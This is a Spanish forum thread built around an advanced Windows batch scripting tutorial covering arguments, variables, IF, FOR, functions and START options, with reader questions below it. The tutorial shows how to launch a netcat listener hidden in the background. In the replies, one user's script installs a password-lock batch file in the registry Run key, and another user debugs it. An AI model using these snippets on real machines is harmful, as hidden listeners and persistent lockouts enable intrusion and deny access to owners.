

Programación BATCH Avanzada.

Temario.

- 1.- Variables y Argumentos.
 - 2.- Imprimir caracteres de comandos.
 - 3.- Algunas otras variables de Entorno.
 - 4.- IF
 - 5.- FOR
 - 6.- Funciones
 - 7.- Includes
 - 8.- Misc
 - 9.- EOF
-

Variables y Argumentos

El manejo de variables en batch, es muy flexible., y este nos permite hacer desde operaciones matemáticas, hasta seleccionar ciertas partes de una variable, así como reemplazar cadenas de texto, y obtener archivos... Y sus propiedades, la fecha, hora, generar números aleatorios, entre otros.

Los argumentos que recibe un batch, son recibidos de la siguiente forma:

batch argumento1 dos tres

hará que:

%0 = batch

%1 = argumento1

%2 = dos

%3 = tres

en %0 se guardara, el nombre del archivo.

Podemos borrar el contenido de un parámetro con el comando shift:

Código

1. @echo off
2. echo %0 %1 %2 %3
3. shift /1
4. echo %0 %1 %2 %3
- 5.

al llamar:

Código

1. C:\Documents and Settings\Administrador\tempcurso>astring 123
456 789
2. astring 123 456 789
3. astring 456 789
- 4.

shift borro, el primer argumento.

Tambien contamos con los siguientes modificadores para los archivos:

Código

1. %~f1 - regresa la ruta y el archivo de %1.
2. %~d1 - regresa la letra de la unidad de %1.
3. %~p1 - regresa solo la ruta del archivo %1.
4. %~n1 - regresa solo el nombre de archivo %1.
5. %~x1 - regresa solo la extension del archivo %1.
6. %~s1 - regresa solo la ruta, con directorios,
con nombres cortos del archivo %1.
7. %~a1 - regresa los atributos del archivo.
8. %~t1 - regresa la hora/fecha del archivo %1
9. %~z1 - regresa el tamaño del archivo %1.
- 10.

por ejemplo:

en un directorio donde tenemos:

Código

1. C:\Documents and Settings\Administrador\tempcurso>dir
2. El volumen de la unidad C no tiene etiqueta.
3. El número de serie del volumen es: A057-553B
- 4.
5. Directorio de C:\Documents and
Settings\Administrador\tempcurso
- 6.
7. 24/07/2006 12:25a <DIR> .
8. 24/07/2006 12:25a <DIR> ..

```

9. 24/07/2006 12:25a                6 archivo.txt
10.                                1 archivos          6 bytes
11.                                2 dirs  401,715,161,088 bytes libres
12.

```

este batch:

Código

```

1. @echo off
2. echo Ruta al archivo: %~f1
3. echo Disco: %~d1
4. echo Solo ruta: %~p1
5. echo Nombre: %~n1
6. echo Extension: %~x1
7. echo Ruta Corta: %~s1
8. echo Atributos: %~a1
9. echo Fecha: %~t1
10. echo Tamaño: %~z1
11.

```

llamándolo analiza.bat, saca el siguiente resultado:

Código

```

1. C:\Documents and Settings\Administrador\tempcurso>analiza
   archivo.txt
2. Ruta al archivo: C:\Documents and
   Settings\Administrador\tempcurso\archivo.txt
3. Disco: C:
4. Solo ruta: \Documents and Settings\Administrador\tempcurso\
5. Nombre: archivo
6. Extension: .txt
7. Ruta Corta: C:\DOCUME~1\ADMINI~1\TEMPCU~1\archivo.txt
8. Atributos: --a-----
9. Fecha: 24/07/06 12:25a
10. Tamaño: 6
11.

```

También podemos usar varias propiedades, por ejemplo, este código:

Código

```

1. @echo off

```

- 2.
3. echo %~anxt1
- 4.

saca este resultado:

Código

1. C:\Documents and Settings\Administrador\tempcurso>analiza
archivo.txt
2. --a----- 24/07/06 12:25a archivo.txt
- 3.

Si lo que recibimos no es un archivo, sino una cadena de texto, que contiene mas de una palabra, se debe poner entre comillas, algo así:

astring "parametro de varias letras"

al obtenerlo, en %1, lo recibimos con comillas, pero si usamos:

Código

1. @echo off
2. echo Con Comillas: %1
3. echo Sin Comillas: %~1
- 4.

saca este resultado:

Código

1. C:\Documents and Settings\Administrador\tempcurso>astring
"parametro de varias letras"
2. Con Comillas: "parametro de varias letras"
3. Sin Comillas: parametro de varias letras
- 4.

Y por ejemplo, si queremos obtener todos los argumentos, se usa:

%*

es decir:

Código

1. `@echo off`
- 2.
3. `echo` Argumentos: `%*`
- 4.

al ejecutar:

astring parametro de varias letras

nos regresa:

Código

1. `C:\Documents and Settings\Administrador\tempcurso>astring`
parametro de varias letras
2. Argumentos: parametro de varias letras

Para asignar a una variable, el valor de algo escrito por el usuario, puedes usar:

set /P variable=

por ejemplo:

Código

1. `@echo off`
2. `echo ¿Como te llamas?`
3. `set /P miva=`
- 4.
5. `echo` Tu te llamas `%miva%`
- 6.

hara algo asi:

Código

1. `C:\Documents and Settings\Administrador\tempcurso>astring`
2. `┐Como te llamas?`
3. Juan
4. Tu te llamas Juan
- 5.

Ahora, si por ejemplo, queremos, hacer algo como, obtener las ultimas 3 letras del nombre:

Código

```
1. @echo off
2. echo Escribe tu Nombre
3. set /P NOM=
4. echo %NOM:~-3%
5.
```

Aqui lo que estamos haciendo en la ultima linea:

%NOM:~-3%

hara, obtener los ultimos 3 caracteres, como si se tratara de la funcion substring.

por ejemplo, esto:

%NOM:~1,3%

obtendra del segundo al cuarto caracter. (empiezas desde 0, recuerda)

Para reemplazar cadenas, dentro de otra variable, es la siguiente sintaxis:

Código

```
1. @echo off
2. echo Escribe una frase
3. set /P FRA=
4. echo %FRA:e=XXX%
```

esto reemplazara las letras "e" por "XXX".

Para hacer calculos matematicos, se usa el modificado /A, de esta forma:

Código

```
1. @echo off
2. set /A x=1
3. echo %x%
```

4. `set` /A x=x*9
5. `echo` %x%
- 6.

tenemos las siguientes operaciones disponibles:

Código

1. `()` - agrupar
2. `*` `/` `%` - operadores aritméticos
3. `+` `-` - operadores aritméticos
4. `<<` `>>` - mayús lógica
5. `&` - AND
6. `^` - XOR
7. `|` - OR
8. `=` `*` `/` `%` `+=` `-=` - asignación
9. `&=` `^=` `|=` `<<=` `>>=`
10. `,` - separador de expresión
- 11.

Con este podemos usar numeros hexadecimales de la siguiente forma:

Código

1. `@echo` off
2. `set` /A x=2
3. `echo` %x%
4. `set` /A x=x*0xff
5. `echo` %x%

al colocar **0x** estamos especificando, que a continuacion se pondra un valor hexadecimal.

Imprimir caracteres sin usar comandos

Ahora, se preguntaran, en las variabes, siempre usamos los signos %
Como imprimes uno?

veamos:

Código

```

1. @echo off
2. set x=pru
3. set pru=HOLA
4.
5. :: Esto imprimira el contenido de x
6. echo %x%
7.
8. ::Esto imprimira la letra x
9. echo x
10.
11. ::Esto imprimira %x%
12. echo %%x%%
13.
14. ::Esto imprimira el valor de x entre %%
15. echo %%x%%
16.
17. :: Lo mismo
18. echo %pru%
19. echo %%pru%%
20. echo %%pru%%
21.

```

En resumen, si quieren imprimir, el caracter %, deben colocarlo 2 veces.

Para otros caracteres, que ejecutan alguna accion en batch como:

```

&
|
<
>

```

debes colocar este caracter antes: ^

por ejemplo:

Código

```

1. echo <html><h1>Hola</h1></html> >index.html
2.

```

no funcionara, pero:

Código

1. `echo ^<html^>^<h1^>Hola^</h1^>^</html^> >index.html`
- 2.

dara:
Código

1. `C:\Documents and Settings\Administrador\tempcurso>type
index.html`
2. `<html><h1>Hola</h1></html>`
- 3.

Algunas otras variables de entorno

Tenemos otras variables de entorno que podrian servir, ademas de las comunes de ALLUSERSPROFILE y HOMEPATH, por ejemplo:

Código

1. `@echo off`
2. `echo Directorio Actual: %CD%`
3. `echo Fecha: %DATE%`
4. `echo Hora: %TIME%`
5. `echo Numero Aleatorio: %RANDOM%`
- 6.

dara como resultado:

Código

1. `C:\Documents and Settings\Administrador\tempcurso>astring`
2. Directorio Actual: C:\Documents and
Settings\Administrador\tempcurso
3. Fecha: Lun 24/07/2006
4. Hora: 2:13:49.33
5. Numero Aleatorio: 24523
- 6.
7. `C:\Documents and Settings\Administrador\tempcurso>astring`
8. Directorio Actual: C:\Documents and
Settings\Administrador\tempcurso
9. Fecha: Lun 24/07/2006
10. Hora: 2:13:51.60
11. Numero Aleatorio: 3681

12.

Otras instrucciones muy utiles, serian POPD y PUSHHD, que sirven para guardar y regresar al directorio actual, por ejemplo:

Código

```
1. @echo off
2. echo %CD%
3. PUSHD \
4. echo %CD%
5. POPD
6. echo %CD%
7.
```

PUSHHD funciona de la siguiente manera:

Guarda el directorio actual., y va a la ruta especificada.

POPD regresa al directorio guardado por PUSHHD

podemos usarlos uno dentro de otro, asi:

Código

```
1. @echo off
2. echo %CD%
3. PUSHD \
4. echo %CD%
5. PUSHD %homepath%
6. echo %CD%
7. POPD
8. echo %CD%
9. POPD
10. echo %CD%
11.
```

IF

If, reconoce varias situaciones:

valores de error
comparar cadenas
existencia de archivos
comparaciones matematicas

como ya sabemos %ERRORLEVEL% almacena algunos valores de otras funciones.

al hacer

```
IF ERRORLEVEL 1 @echo ok ELSE @echo no
```

estariamos preguntando si ERRORLEVEL es 1, si lo es imprime OK, si no, imprime NO.

tambien podemos comparar cadenas, por ejemplo:

Código

```
1. @echo off
2. IF "%~1"=="hola" echo hola
3.
```

usamos %~1 para que aunque el usuario ponga comillas, no salga error ;)

Código

```
1. @echo off
2. IF /I "%~1"=="hola" echo hola
3.
```

este codigo, solo responde si dices hola CON minusculas. /I es para hacer mas estricta la comparacion.

ahora, podemos usar IF en varias lineas:

Código

```
1. @echo off
2. IF EXIST %~snx1 (
3. echo EXISTE!
```

```

4. ) ELSE (
5. echo NO EXISTE
6. )
7.

```

con parentesis ().

si vamos a usar comparaciones numericas, debemos usar los siguientes codigos de comparación:

Código

```

1.
2.      EQU - igual
3.      NEQ - no igual
4.      LSS - menor que
5.      LEQ - menor que o igual
6.      GTR - mayor que
7.      GEQ - mayor que o igual
8.
9.

```

por ejemplo:

Código

```

1. @echo off
2. echo Cual es tu edad?
3. SET /P m=
4. IF %m% GEQ 18 (
5. echo ERES MAYOR DE EDAD
6. ) ELSE (
7. echo NO ERES MAYOR DE EDAD
8. )
9.

```

que regresa:

Código

```

1. C:\Documents and Settings\Administrador\tempcurso>acon
2. Cual es tu edad?
3. 19

```

```
4. ERES MAYOR DE EDAD
5.
6. C:\Documents and Settings\Administrador\tempcurso>acon
7. Cual es tu edad?
8. 17
9. NO ERES MAYOR DE EDAD
10.
```

Tambien podemos saber si una variable ya fue definida:

Código

```
1. IF DEFINED var (
2. echo SI
3. ) ELSE (
4. echo NO
5. )
6.
```

FOR

FOR es una herramienta muy completa, nos permite analizar segmentos de la salida de comandos, funciones y el contenido de archivos.

Tambien permite hacer bucles de la siguiente manera:

Código

```
1. FOR /L %%var IN (inicio,incremento,fin) DO (acciones)
```

inicio, es el valor inicial, incremento es la cantidad a sumar, y fin es la cantidad a detenerse, por ejemplo:

Código

```
1. FOR /L %%i IN (0,1,10) DO (echo %%i)
```

imprimira 0 1 2 3 4 5 6 7 8 9 10

sinembargo, la forma mas sencilla de usar FOR, es para numerar archivos, y hacer algo con ellos.. por ejemplo:

Código

```
1. FOR %%x in (x*) DO echo %%x
```

mostrará todos los archivos que empiezan con x.

para SOLO mostrar directorios:

Código

```
1. FOR /D %%x in (m*) DO echo %%x
```

el modificador "/D", mostrará solo los directorios, que empiesen con m.

El comando se puede hacer "recursivo", es decir, que se ejecute dentro de cada directorio, con el comando "/R", por ejemplo, en una estructura de directorios como la siguiente:

Código

```
1. &#9500;&#9472;&#9472;&#9472;adios
2. &#9474;      &#9492;&#9472;&#9472;&#9472;algo
3. &#9474;      &#9492;&#9472;&#9472;&#9472;xx
4. &#9492;&#9472;&#9472;&#9472;hola
5.
```

al ejecutar el comando:

Código

```
1. FOR /R /D %%x in (a*) DO echo %%x
2. C:\adios
3. C:\adios\algo
```

sinembargo, al ejecutar el comando..

Código

```
1. FOR /R %%x in (*x*) DO echo %%x
2. C:\ax.txt
3. C:\adios\sx.txt
4. C:\adios\wx.txt
5. C:\adios\algo\kx.txt
6. C:\adios\algo\xx\xx.txt
7. C:\hola\ax.txt
8. C:\hola\rx.txt
```

nos mostrara todos los archivos que coinciden con la sequencia especificada, incluso podriamos hacer un buscador en batch, con el uso de FINDSTR y FOR.

Tenemos otro modificador, /F que nos permite usar ciertas opciones para separar el resultado de las acciones.. comandos, cadenas, o archivos. Su sintaxis es la siguiente:

Código

```
1. FOR /F ["opciones"] %var IN (conjunto) DO (acciones)
```

conjunto puede ser:

conjunto de archivos -> sin comillas

cadena de caracteres -> con comillas dobles (" ")

comando -> con comilla simple (' ')

las opciones son las siguientes:

eof -> todo lo que este despues de este caracter sera ignorado (para cada linea)

skip -> numero de lineas a saltarse al principio del archivo/comando.

delims -> esto sirve para separar las strings.. si no se coloca esta opcion, se usaran como separadores "espacio" y "tab"

tokens -> esto es para especificar cuales segmentos, delimitados por "delims", seran pasados a las variables.. por ejemplo:

1,2,3

solo pasara los primeros 3 segmentos.

1,2*

pasara 2 segmentos, el primero y todo lo que este despues (el * regresa todo el resto de la linea)

1,2-6,8,9*

regresara 4 segmentos, el primero, desde el segundo hasta el sexto, el octavo y el resto de la linea, despues del noveno, el signo de menos (-) genera intervalos.

por ultimo, esta la opcion:

usebackq -> que cambia la forma de interpretar si es string o comando, de la siguiente manera:

'cadena'

`comando`

Nota: [`] es diferente al caracter de acento [´]

por ejemplo, el siguiente comando:

Código

```
1. FOR /F "tokens=1,3-5,7-9,10* delims= " %%i IN ("George no es  
malvado, es bondadoso, siempre piensa en los demas.") DO echo  
%%i %%j %%k %%l tonto, %%m %%n %%o matar a %%p %%q
```

dara de resultado:

Código

```
1. George es malvado, es tonto, siempre piensa en matar a los  
demas.
```

Funciones

El uso de argumentos, de etiquetas y de filtros nos ayuda mucho al momento de escribir un código.

Muchos creen que las etiquetas solo sirven para los goto.. sinembargo una etiqueta puede servir de función y recibir parámetros.

miren, el siguiente programa:

Código

```
1. @echo off  
2. call:funcion 1 2 3  
3. call:funcion %*  
4. goto:EOF  
5. :funcion  
6. echo Estoy en: %~nx0-^>%0 %*
```

al ser llamado, por ejemplo en:

Código

```
1. C:\>ejemplo  
2. Estoy en: ejemplo.bat->:funcion 1 2 3  
3. Estoy en: ejemplo.bat->:funcion
```


el primero muestra los parametros enviados por el batch (1 2 3), y el segundo los parametros enviados al programa.
en este otro ejemplo:
Código

```
1. C:\>ejemplo HOLA MUNDO
2. Estoy en: ejemplo.bat->:funcion 1 2 3
3. Estoy en: ejemplo.bat->:funcion HOLA MUNDO
```

la funcion obtiene tambien los argumentos del programa.

hasta ahora.. todo es igual a usar goto a excepcion del uso de argumentos, sinembargo.. si queremos hacer un.. "return", se hace usando:

goto:EOF

entonces, en situaciones como:

Código

```
1. @echo off&call:main&goto:EOF
2.
3. :suma
4. set /A res=%1 + %2
5. echo %res%
6. goto:EOF
7.
8. :resta
9. set /A res=%1 - %2
10. echo %res%
11. goto:EOF
12.
13. :multiplica
14. set /A res=%1 * %2
15. echo %res%
16. goto:EOF
17.
18. :main
19. set /P arg=Escribe 2 numeros separados por un espacio
20. echo %arg%
21. echo su suma es:
22. call:suma %arg%
23.
24. echo su resta es:
25. call:resta %arg%
26.
27. echo su producto es:
```

```
28.      call:multiplica %arg%
29.
30.      goto:EOF
31.
```

como podemos ver goto:EOF se usa para regresar al orden de comandos.

el resultado es algo asi:

Código

```
1. C:\>operaciones
2. Escribe 2 numeros separados por un espacio 6 2
3. 6 2
4. su suma es:
5. 8
6. su resta es:
7. 4
8. su producto es:
9. 12
10.
```

Includes

Para hacer un "include" o incluir un archivo, solo debes llamarlo asi:
archivo_a_incluir.bat funcion argumentos
y en el archivo a incluir, debe de estar al principio: **@echo
off&call:%*&goto:EOF**

queda algo asi:

Código

```
1. @echo off&call:%*&goto:EOF
2. :funcion1
3. ...
4. :funcion2
5. ...
6.
```

por ejemplo:

--inclu.bat--

Código

```
1. @echo off&call:~*&goto:EOF
2.
3. :cabeza
4. echo #####
5. echo # Hecho por: #
6. echo # sirdarckcat #
7. echo #####
8. goto:EOF
9.
10. :uso
11. echo uso:
12. echo %~nx0 Nombre
13. goto:EOF
14.
15. :nombre
16. echo Hola %*
17. goto:EOF
18.
```

--inicio.bat--

Código

```
1. @echo off
2. if "%~1"==" " (
3. inclu.bat cabeza
4. inclu.bat uso
5. ) else (
6. inclu.bat nombre %~1
7. )
8.
```

esto daría este resultado:

Código

```
1. C:\>inicio
2. #####
3. # Hecho por: #
4. # sirdarckcat #
```

```
5. #####
6. uso:
7. inclu.bat Nombre
8.
9. C:\>inicio sirdarckcat
10.     Hola sirdarckcat
11.
12.     C:\>
13.
```

Misc

Algunos filtros y comandos interesantes:

- `comando | more`

muestra el resultado del comando de forma paginada

- `comando | sort`

muestra el resultado del comando de forma ordenada

- `TITLE "algo"`

cambia el titulo de la ventana de CMD

- `SUBST ruta/a/alguna/carpeta [letra_unidad]`

asigna a letra_unidad la ruta de acceso

- `FIND "cadena"`

busca cierta cadena en un archivo (se puede usar como filtro), con el modificador /v encuentra solo las que NO tienen la linea especificada. (para mas info, escribe en CMD: FIND /?)

- `FINDSTR`

extension de FIND, acepta expresiones regulares, y busqueda general (lo mas parecido que DOS tiene a grep), descripción detallada:
Código

1. Busca cadenas en los archivos.
- 2.

3. FINDSTR [/B] [/E] [/L] [/R] [/S] [/I] [/X] [/V] [/N] [/M] [/O]
[/P]
4. [/F:archivo]
5. [/C:cadena] [/G:archivo] [/D:lista de directorios]
[/A:atributos de color]
6. [cadenas] [[unidad:][ruta]nombredearchivo[...]]
- 7.
8. /B Hace coincidir los modelos si están al principio
de la línea.
9. /E Hace coincidir los modelos si están al final de la
línea.
10. /L Literalmente utiliza cadenas de búsqueda.
11. /R Utiliza cadenas sde búsqueda como expresiones
regulares.
12. /S Busca archivos que coinciden en el directorio
actual y en todos
13. los subdirectorios.
14. /I Especifica que la búsqueda no distingue
mayúsculas de minúsculas.
15. /X Imprime líneas que coinciden con exactitud.
16. /V Sólo imprime líneas que no contienen una
correspondencia.
17. /N Imprime el número de la línea antes de la
línea que coincide.
18. /M Sólo imprime el nombre de archivo si el
archivo contiene una
19. correspondencia.
20. /O Imprime un carácter de desplazamiento antes de
las líneas que
21. coinciden.
22. /P Omite archivos con caracteres que no son
imprimibles
23. /A:attr Especifica atributos de color con dos dígitos
hexadecimales. Ver
24. "color /?"
25. /F:archivo Lee la lista de archivos desde el archivo
especificado
26. (/ significa consola).
27. /C:cadena Utiliza una cadena especificada como una
búsqueda de cadena
28. literal.
29. /G:archivo Coje la búsqueda de archivos desde el
archivo especificado
30. (/ significa consola).

31. /D:dir Busca un signo de punto y coma de la lista delimitada de
32. directorios
33. cadenas Texto que se debe buscar.
34. [unidad:][ruta]nombredearchivo
35. Especifica un archivo o archivos que buscar.
- 36.
37. Utiliza espacios para separar múltiples cadenas de búsqueda a no ser que
38. el argumento lleve un prefijo con /C. Por ejemplo, 'FINDSTR "qué tal" x.y'
39. busca "qué" o "tal" en el archivo x.y. 'FINDSTR /C:"qué tal" x.y' busca
40. "qué tal" en el archivo x.y.
- 41.
42. Expresión regular de referencia rápida:
43. . Comodín: cualquier carácter
44. * Repetir: cero o más ocurrencias de un carácter previo o de clase
45. ^ Posición de línea: comienzo de la línea
46. \$ Posición de línea: fin de línea
47. [clase] Clase de carácter: cualquier carácter en la serie
48. [^class] Clase inversa: cualquier carácter que no esté en la serie
49. [x-y] Intervalo: cualquier carácter que esté dentro del intervalo
50. especificado
51. \x Escape: uso literal de un metacarácter x
52. <xyz Posición de palabra: principio de palabra
53. xyz\> Posición de palabra: fin de palabra
- 54.
55. Para obtener una información más completa sobre expresiones regulares de
56. FINDSTR referirse al Comando de referencia Command en línea.
- 57.
- 58.

- start "titulo ventana nueva" [OPCIONES] comando argumentos

START tiene mas opciones de las que son usadas comunmente.
"titulo ventana nueva" especifica el titulo de la ventana que se generará.

las opciones entre otros contienen:

/Druta - el programa inicia en el directorio..

/B - la aplicación se inicia sin ventana

/I - se inicia la aplicacion con el entorno original, es decir las modificaciones al entorno hechas en esta sesion, no afectaran el nuevo programa

/MIN - La nueva ventana se inicia minimizada

/MAX - La nueva ventana se inicia maximizada

/SEPARATE - El programa se inicia en una zona de memoria separada

/SHARED - El programa se inicia en una zona de memoria compartida

Iniciar en prioridades:

/LOW - baja

/NORMAL - normal

/HIGH - alta

/REALTIME - tiempo real

/ABOVENORMAL - sobre lo normal

/BELOWNORMAL - debajo de lo normal

/WAIT - Inicia el programa, y espera hasta que termine de ejecutarse

por ejemplo, si quieren abrir un programa sin generar una ventana, por ejemplo netcat, podrian hacer algo asi:

```
start /B /SEPARATE /HIGH /I /D %WINDIR% nc -L -p 1337 |exit
```

que lo inicia en una zona de memoria separada, con prioridad alta, en el contexto original, y en %windir%

EOF

EOF es una etiqueta que define el fin del archivo, sirve para terminar funciones, y en este caso, solo sirve para terminar el documento :), espero les sirva ;)

(c) Sirdarckcat 2006

Autorizo la reproducción total o parcial de este documento bajo la licencia de documentación libre de GNU (GFDL), una copia puede ser encontrada en <http://www.gnu.org/licenses/fdl.txt>

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **Ilore** en **19 Diciembre 2006, 21:14**

Heyyy esta muy bueno !! lo voy a leer cuando tenga tiempo ;D ;D ;D ;D ;D

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **Hendrix** en **19 Diciembre 2006, 22:47**

Y esto es de julio del 2006???? :-\ :-\ :-\

Clap, Clap, Clap....fenomenal!!!! ;D ;D

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **sirdarckcat** en **20 Diciembre 2006, 01:03**

Estama oculto en papelera xD, (pero incompleto), por eso dice julio 2006 :P

Saludos!!

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **Apache14** en **20 Diciembre 2006, 02:47**

Oye Sirdarckcat has hecho un gran aporte a la humanidad, la verdad ya llevo tiempo programando en Batch y nunca habia visto algo igual, se te agradece man.

(<http://img289.echo.cx/img289/513/matrix19ze.gif>)(<http://img289.echo.cx/img289/2485/matrix21ta.gif>)

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **kanzix** en **24 Diciembre 2006, 16:40**

Exelente sdc!! te a quedado muy bien :P

salu2 ;D

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **ne0x** en **26 Diciembre 2006, 19:38**

La verdad es que es lo que buscaba, la unica forma de progresar un poco en batch era investigar en la shell, esta muy bien este manual.

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **Kefren** en **28 Marzo 2007, 12:53**

Seee, yo tambien buscaba algo asi, gracias Sirdarckcat

SaluDOS

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **Ture** en **28 Junio 2007, 23:50**

buenas caballero xq no me funciona esto?

```
@echo off
set hola=time /T
time /T
echo %hora%
```

por qué me da esto?

```
C:\>jan.bat
23:50
time /T
```

```
C:\>
```

```
y no
C:\>jan.bat
23:50
23:50
```

```
C:\>
```

muchas gracias caballero!

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **sirdarckcat** en **29 Junio 2007, 01:37**

no funciona porque no puedes eso :P
usa:

%TIME%

eso siempre te regresa la hora.

Saludos!!

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **Luzbelitox** en **30 Junio 2007, 05:20**

felicitaciones Sirdarckcat, tenia problemas con el for pero ya estoy entendiendo mejor..
gracias! y saludos!

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **Ture** en **30 Junio 2007, 22:03**

creo que no me explique bien con el ejemplo sorry, lo que yo quiero hacer es en una variable string meter el resultado del output de un programa, ya sea el time, como el date o el ture.exe que me devuelve un numero aleatorio del 1 al 10

muchas gracias!!!

PD: lo estoy haciendo actualmente con la dll de cygwin y usando la potencia de bash, pero me gustaría dejar un .bat limpio y no usar ese tipo de ñapas

saludos!

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **sirdarckcat** en **30 Junio 2007, 23:45**

Puedes usar FOR..

```
FOR /F "" %i IN ('time /T') DO set hola=%i
```

Saludos!!

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **Ture** en **10 Julio 2007, 20:46**

tio eres un crack! ;) muchísimas gracias, es cojonudo tu tuto

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **TxShack** en **11 Julio 2007, 15:11**

Bueno, queria saber si me podriais ayudar con este batch

Lo que quiero es que se añada al registro run pero no consigo hacerlo... algo debo de acer malalgo.. pero no se que... ace muchisimo que no uso los batch, porq se me daban bien.. pero se me an olvidado cosas poco a poco y aora no me sale esto

El codigo que qiero q salga es este:

```
Citar
@echo off
:menu
echo.
echo INTRODUCIR CLAVE
echo.
set/p clave=
if %clave%==fark (goto bien) else goto :menu
:bien
cls
echo.
echo ACCESO VALIDADO
echo.
pause
exit
```

Lo e estado intentando varias veces pero no lo consigo... e provado esto.. poro no funciona

```
Citar
@echo off
cd c:\
echo @echo off > pass.bat
echo :menu >> pass.bat
echo echo. >> pass.bat
echo INTRODUCIR CLAVE >> pass.bat
echo echo. >> pass.bat
echo set/p clave= >> pass.bat
echo if %clave%==fark (goto bien) else goto :menu >> pass.bat
echo :bien >> pass.bat
echo cls >> pass.bat
echo echo. >> pass.bat
echo echo ACCESO VALIDADO >> pass.bat
echo echo. >> pass.bat
```

```
echo pause >> pass.bat
echo exit >> pass.bat
reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v
pass.bat /t reg_sz /d C:\ /f
start c:\pass.bat
exit
```

Estare aciendo algo mal.. pero no se que... la cuestion es q no funciona..

Provadlo y vereis, y si me podeis ayudar os lo agradeceria ^^

bueno, y una ultima cosa... q tendria q añadirle para que quien lo ejecute no pueda dar a la X.. osea, q si intenta cerrar no pueda. Gracias

Un saludo

TxShack

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **It@c|-|i** en **30 Julio 2007, 18:10**

buenas TxShack ya han pasado unos dias ... espero no responder tarde esto xD soy nuevo por aca pero por si aun no lo encuentras.. no es tan dificil solo que apenas lei tu post :P hace nos minutos...

solo usaste un poco mal la adicion al registro y una de tus lineas esta mal

tu linea mal es esta le falta el echo

Citar

```
echo INTRODUCIR CLAVE >> pass.bat
```

cambiala por

```
echo echo INTRODUCIR CLAVE >> pass.bat
```

y la linea del registro va asi..

Citar

```
reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v pass /t
reg_sz /d C:\pass.bat /f
```

recuerda que /v asigna el nombre del valor a agregar y en /d el archivo a ejecutar porque si lo dejas en c:\ solo abriras el explorer en C..

cuidate ..

-----modificado-----

ohhh se me olvido una linea mas pero aca esta

Citar

```
echo if %clave%==fark (goto bien) else goto :menu >> pass.bat
```

esa linea no va a escribir en tu archivo asi por los % necesitas aumentarle otro mas a cada uno para que en el otro archivo escriba los %, esta de abajo debes usar:

Citar

```
echo if %%clave%%==fark (goto bien) else goto :menu >> pass.bat
```

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **TxShack** en **31 Julio 2007, 12:16**

Muchas gracias por la ayuda... del fallo del echo echo INTRODUCIR CLAVE me di cuenta mas tarde, pero de los otros no ^^

Gracias de nuevo

Un saludo

TxShack

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **jaimico195** en **4 Agosto 2007, 23:40**

una preguntita jeje esta medio tonta pero espero no fastidiarlos ni quitarles el tiempo jeje esque soy nuevo pero ya lei varios manuales de batch pero me segui a este pero no lo entiendo, el principio se me dificulta.

miren mi code no me funciona:

```
echo me llamo mico, mi edad es de 15 años  
echo %3 %5 %8 %9
```

y quisiera que salga mico, edad 15 años
pero me dice algo asi "echo esta activado"

lo he hecho con varios codigos diferentes, añadiendole @echo off cambiado cositas pero siempre me aparece "echo esta activado", espero que me puedan ayudar esque yo me vaso en los ejemplos(los codigos) porque los modifiko y los entiendo entonces si me ponen un codigo que si me muestre eso que puse ya con eso sigo con el manual jeje gracias.
saludos jaimico195

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **Siuto** en **4 Agosto 2007, 23:48**

Cuando usas %1, %2, ..., %9 te estas refiriendo a los argumentos que estas pasandole al programa prueba lo siguiente:

Código:

```
@echo off
```

```
echo %3 %5 %8 %9
```

A este programa pasale como argumento *me llamo mico, mi edad es de 15 años*

Ahi si tendria que funcionar (En los argumentos no copie el echo).
Si no se entiende avisa que se explica mejor entonces...

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **jaimico195** en **5 Agosto 2007, 00:12**

jeje la verdad no le entendi donde poner me llamo mico, mi edad es de 15 años

la verdad nunca entendi que es el argumento deseguro muchas veces lo aplico pero no se como se llama

me podrias poner un completo ya con todo y el argumento

osea que es todo lo que tengo que hacer porque si me pones

c:\mico>>lo que sea y eso no entiendo ni que es, solo entiendo

que es >> que es que se va a poner en la siguiente linea del texto que

escoja, soy medio malo para entenderle jeje, hasme un miniejercicio

porfa si tienes tiempo jeje esque no me gusta molestar mucho por mi

lentitud de aprendizaje jeje.

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **Siuto** en **5 Agosto 2007, 01:01**

Los argumentos del programa se especifican cuando lo corres desde el MS-DOS por ejemplo.

Para abrir el programa desde MS-DOS por ejemplo guarda tu archivo.bat en C:\archivo.bat y luego hace lo siguiente:

Código:

```
Inicio >> Ejecutar... >> cmd >> C:\archivo.bat
```

ahi lo que hiciste fue abrir el archivo desde MS-DOS sin pasar ningun argumento al mismo.

Para pasarle argumentos al archivo.bat tenes que seguir los mismos procedimientos pero en el mosmendo que estas en la ventana de MS-DOS escribis

Código:

```
C:\archivos.bat me llamo mico, mi edad es de 15 años
```

Ahi le estarias pasando al archivo.bat 9 argumentos distintos.

Donde me es el argumento %1

llamo ... %2

mico ... %3

Y asi sigue hasta el %9

Me explique mejor ahora? Cualquier duda consulta...

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: jaimico195 en 5 Agosto 2007, 01:37

ok, ahora ya tengo argumentos en mi hola.bat

mira hice esto:

Código:

```
c:\echo hola como estas>hola.bat
```

ok ahora ya vi el archivo y solo dice "hola como estas"

ahora que hago para que muestre %1 y %3

osea que le pongo para que muestre los argumentos de ese archivo

